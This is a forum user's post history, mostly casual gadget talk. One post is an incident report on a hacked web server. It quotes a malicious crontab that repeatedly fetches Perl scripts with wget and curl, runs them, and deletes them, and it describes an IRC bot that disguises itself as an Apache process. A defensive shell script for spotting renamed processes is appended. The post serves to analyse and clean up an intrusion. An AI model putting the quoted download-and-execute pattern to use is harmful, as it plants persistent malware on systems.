Messages - Pinako

General Chat / Re: Uses for an old Atom netbook in 2014?
« on: Today at 11:30:06 AM »
You could use it as a management terminal for your servers :D

Maybe a [bulky] digital picture frame?

General Chat / Re: Mobile Keyboard recommendations?
« on: Today at 11:26:37 AM »
Yeah, that layout looks slightly difficult to use. I've got an HP K4000 keyboard (refurbished for $15 recently) that has been working great for the past couple of months. It sleeps well, wakes promptly, and types comfortably.

My AmazonBasics keyboard looks similar (i.e. sleek) and worked well for ~8 months before it started getting flaky; the version for iDevices has an extra row of keys, which I appreciated.

I've also tried the bottom-of-the-barrel keyboards i.e. Anker, iClever, etc. They're good for most purposes, and the main problem is that they might take a second to wake up after some inactivity; there might also be some occasional repeated/dropped keystrokes. It happens often enough to be a minor annoyance at times, but shouldn't be a problem for light-duty work.

I was thinking it got installed on Sept 14th ;) still no sign of recurrence.

I agree.

Then again, I wanna see what this clever bot could do ;)
The damage potential is low: the host is behind a NAT device and the only publicly-mapped port is 80. Ofc, it could call home with all kinds of data, spew some spam, DoS some targets, etc. It's fun to live dangerously.

No attack source IPs... but the attacker isn't exactly discreet about flaunting his/her domain name.

5 went down last night, so I decided to investigate. When I logged in, I found:

$ ps aux | grep apache
www-data  3454  0.0  0.8  32032  4168 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9236  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9250  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
www-data  9264  0.0  0.8  32032  4172 ?        S    Sep23   0:00 /usr/bin/apachessl
... ... ...

... and so on. There were dozens of processes named /usr/bin/apachessl and no memory left. All the processes were owned by www-data (the web server's account) and children of init (i.e. daemonized). When I killed these processes, they returned after a few minutes. At first glance, one might conclude that something was making the web server fork out of control.

The kicker was that 1) I use nginx, 2) I don't have apache installed, and 3) there's no /usr/bin/apachessl on the filesystem. Wait, what?

Suspecting that some rogue process was renaming itself to avoid detection, I dug around under /proc to locate the executable image. It turned out to be none other than the Perl interpreter. This was a Perl script.

Checking my crontabs, I found:

$ cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Sun Sep 14 02:20:01 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * cd /tmp;wget;curl -O;perl abc.txt;rm -f abc.txt
*/30 * * * * cd /tmp;wget;curl -O;perl xyz.txt;rm -f xyz.txt

Whoa! I don't remember installing this crontab. Here's a pastebin mirror of abc.txt. Doesn't it look like a bot that calls home to an IRC server? Yet, this is no ordinary IRC server: it runs on port 8080 and speaks HTTP at first (fooling some intrusion detection systems), but quickly switches to IRC. Unfortunately, I wasn't able to retrieve xyz.txt.

So I killed all the rogue processes, cleaned up the crontab, and rebooted; so far, the processes haven't returned. I also updated/reinstalled WordPress for good luck :)

What do you think?
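
The check described in the post above (comparing the name a process displays with its real executable image under /proc), as an added example that is not part of the original post. The sample tree is constructed so the script runs offline; PID 812 and the /usr/bin/perl path are assumptions, and the rule is a heuristic that can flag daemons which rewrite their own title.

```shell
#!/bin/sh
# Added example: list processes whose displayed name is an absolute path that
# does not exist on disk while /proc/<pid>/exe points at some other binary.

# find_masquerading [PROC_ROOT] -> prints "pid exe argv0" per suspicious process
find_masquerading() (
    root=${1:-/proc}
    for dir in "$root"/[0-9]*; do
        [ -r "$dir/cmdline" ] || continue
        # exe is a symlink to the real image; renaming the process cannot change it
        exe=$(readlink "$dir/exe" 2>/dev/null) || continue
        # cmdline is NUL-separated; argv[0] is what ps shows and the process can overwrite it
        argv0=$(tr '\0' '\n' < "$dir/cmdline" | head -n 1)
        case $argv0 in
            /*) ;;              # only absolute paths can be checked against the disk
            *) continue ;;      # empty (kernel thread) or relative name: skip
        esac
        if [ "$argv0" != "$exe" ] && [ ! -e "$argv0" ]; then
            printf '%s %s %s\n' "${dir##*/}" "$exe" "$argv0"
        fi
    done
)

# make_sample_proc DIR: constructed /proc-like tree (not data from the post's host)
make_sample_proc() {
    mkdir -p "$1/3454" "$1/812"
    printf '/usr/bin/apachessl\0' > "$1/3454/cmdline"    # renamed Perl process
    ln -sf /usr/bin/perl "$1/3454/exe"                   # assumed interpreter path
    printf '/bin/sh\0-c\0sleep 60\0' > "$1/812/cmdline"  # ordinary process
    ln -sf /bin/sh "$1/812/exe"
}

sample=$(mktemp -d)
make_sample_proc "$sample"
find_masquerading "$sample"     # on a live host: run as root with no argument
rm -rf "$sample"
```
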

General Chat / Re: Does anyone know how....
« on: September 19, 2014, 09:11:19 PM »
Windows is set up on a separate partition.
I'm tempted to put Windows 8 on a USB disk. WinXP was the last Windows release that worked well on USB for me.

General Chat / Re: Apple Watch
« on: September 14, 2014, 11:41:24 AM »

iirc, the first generation Galaxy Gear was going for some $60 at Best Buy recently...
Keep in mind the Galaxy Gear REQUIRES a Samsung smartphone - it won't work with just any Android device, iirc. But if you're talking about just using it for the screen, you might be able to do that with some hardware magic.

Yeah, you do need a Galaxy Gear approved phone to activate the first generation Galaxy Gear before you could root and reflash it; after that, it'd work with any Android device and function pretty much independently. If you're sneaky enough, you could probably do this at the store ;)

General Chat / Re: Apple Watch
« on: September 14, 2014, 10:06:32 AM »

iirc, the first generation Galaxy Gear was going for some $60 at Best Buy recently... it might be a combination of age and competition from Apple. I'm not quite sold on the idea of gaming on a smart watch, but the whole thing might be small enough to embed into a controller, gameboy-style.

General Chat / Re: Apple Watch
« on: September 09, 2014, 04:39:54 PM »
Heh, that looks like an iPod Nano with a strap... not bad. But gold that's twice as hard as standard gold? I guess that's Apple-speak for impurities. What do you think of LG's G Watch R?

General Chat / Re: The Cheapest Smartphone Plan
« on: September 08, 2014, 08:24:05 PM »
A fake one? A virtual one :) See if your credit card company offers this handy feature. It might even let you set limits.

The thing to look out for, though, is using more data than you intended. They do cut you off at 400 mb, but the lagging reporting system would allow you to run up the extra bytes if you worked quickly enough. And you gotta call to switch to the free plan. Not that it matters... because they've sold out ???

General Chat / Re: I'm back | yet again.
« on: September 08, 2014, 05:48:10 AM »
Hey now. It's a communicable disease.


General Chat / Re: The Cheapest Smartphone Plan
« on: September 08, 2014, 05:44:21 AM »
Is it worth generating a one-time credit card number for a $25 media player? They've also been around for a while, and I think they plan to stick around for a while longer.

General Chat / Re: The Cheapest Smartphone Plan
« on: September 07, 2014, 11:02:00 AM »
It's a $25 media player :) (oh yeah, and free Sprint 3G/WiMAX service if you wanna use it)

General Chat / Re: Gitlab
« on: September 05, 2014, 05:39:11 PM »
I've tried Gitlab. It's cool. Gitolite works well for a far simpler system.

General Chat / Re: Weekend code project
« on: August 29, 2014, 11:19:12 PM »
Ooh, a TiVo for radio shows. Does it skip commercials, too? ;)
Excellent work. Thanks for sharing.

General Chat / Re: Does anyone know how....
« on: August 29, 2014, 04:20:45 PM »
I haven't gone as far as serving up home directories on the network, but I can imagine how it's done... so yeah, it's just a plain old samba/nfs share. Portable apps are nice because of the package manager. Next on the roadmap is portable file type associations.

General Chat / Re: Books
« on: August 28, 2014, 10:36:31 PM »
They sure do. And then there's

General Chat / Re: Books
« on: August 28, 2014, 04:56:26 PM »

General Chat / Re: My new little project (pinako might like this)
« on: August 24, 2014, 11:01:28 PM »
Make it happen. Also, install a few more monitors:

General Chat / Re: Does anyone know how....
« on: August 24, 2014, 10:57:08 PM »
Yeah, well... I try to make it really easy to reinstall. This means Dropbox, network storage, PortableApps, and installer backups :3
